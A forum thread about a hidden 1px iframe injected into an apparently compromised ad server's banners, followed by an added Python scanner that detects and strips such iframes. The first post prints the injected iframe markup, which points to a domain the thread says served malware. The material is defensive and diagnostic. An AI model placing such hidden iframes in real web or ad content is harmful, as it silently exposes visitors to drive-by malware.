pxl_rene

Strange Iframe Requests In Banners


heya folks,

As our ad infrastructure has been hacked multiple times, I was just playing around with my MySQL proxy on my system for testing purposes.

So, while I was looking at the screen I noticed something I have seen before - strange queries.

"<iframe src=\"http://ikromet.c0m.li/ZaARRCFGGgXtN9DBr6OZk5ZHOyKBLc1S\" name=\"Alexa\" scrolling=\"auto\" frameborder=\"no\" align=\"center\" height = \"1px\" width = \"1px\"></iframe>\";s:9:\"htmlcache\";s:169:\"<iframe src=\"http://ikromet.c0m.li/ZaARRCFGGgXtN9DBr6OZk5ZHOyKBLc1S\" name=\"Alexa\" scrolling=\"auto\" frameborder=\"no\" align=\"center\" height = \"1px\" width = \"1px\"></iframe>

 

I saw that domain some time ago and now I'm wondering what this is.

I'm guessing that this is some code which surely doesn't belong there.

So now my question is: how did it get there, what is it supposed to mean, and how can I get rid of it?

 

kind regards,

 

rene

 


hey,

This happens in the deliverycache, for example. But I can't find the code in the Admin Interface.

So which part of the Adserver is responsible for the generation of the deliverycache PHP files?


After some research it showed that once back in time, ikromet.c0m.li was linked to a Ukrainian IP (no offense intended) and it seems like this was used for serving malware stuff. A 1px iframe, which nobody notices.

So I went to the table oa_banners and searched for banners with ikromet in their fields.

I replaced every field with an empty string.

But I'm still interested in how this got into the databases..

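A defender's version of the search described in the last post, as an added example that is not part of the original thread or of the ad server's own code: it flags any near-invisible iframe in banner HTML rather than one known hostname, and removes only that tag instead of blanking the whole field. The column names `bannerid` and `htmltemplate`, the `max_px` threshold and the sample rows are assumptions.

```python
import re
from urllib.parse import urlparse

# <iframe ...>...</iframe>; attribute parsing tolerates backslash-escaped
# quotes and spaces around "=", as in the query captured in the first post.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>.*?</iframe>", re.I | re.S)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*\\?["']?([^"'\\\s>]+)""")

def _px(value):
    m = re.match(r"\d+", value or "")
    return int(m.group()) if m else None

def _is_hidden(tag_attrs, max_px):
    a = {k.lower(): v for k, v in ATTR_RE.findall(tag_attrs)}
    h, w = _px(a.get("height")), _px(a.get("width"))
    hidden = h is not None and w is not None and h <= max_px and w <= max_px
    return hidden, urlparse(a.get("src", "")).hostname

def scan_rows(rows, fields=("htmltemplate", "htmlcache"), max_px=2):
    """Return (bannerid, field, iframe host) for every near-invisible iframe."""
    hits = []
    for row in rows:
        for field in fields:
            for m in IFRAME_RE.finditer(row.get(field) or ""):
                hidden, host = _is_hidden(m.group(1), max_px)
                if hidden:
                    hits.append((row["bannerid"], field, host))
    return hits

def strip_hidden_iframes(html, max_px=2):
    """Remove only the tiny iframes; keep the rest of the creative.
    For plain HTML columns only: a PHP-serialized value carries a length
    prefix (the s:169: in the post) that this removal would invalidate."""
    return IFRAME_RE.sub(
        lambda m: "" if _is_hidden(m.group(1), max_px)[0] else m.group(0), html)

# Constructed sample rows; hosts and column names other than htmlcache are assumptions.
INJECTED = ('<iframe src=\\"http://bad.example.invalid/x\\" name=\\"Alexa\\" '
            'height = \\"1px\\" width = \\"1px\\"></iframe>')
ROWS = [
    {"bannerid": 11, "htmltemplate": '<img src="a.png">', "htmlcache": ""},
    {"bannerid": 12, "htmltemplate": '<img src="b.png">' + INJECTED,
     "htmlcache": INJECTED},
    {"bannerid": 13, "htmltemplate": '<iframe src="https://video.example.invalid/p" '
                                     'width="300" height="250"></iframe>'},
]

if __name__ == "__main__":
    for hit in scan_rows(ROWS):
        print(hit)
```

The list of affected banner ids is also the starting point for the open question in the thread: comparing those rows' modification times with web-server and admin-login logs narrows down how the content was written.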
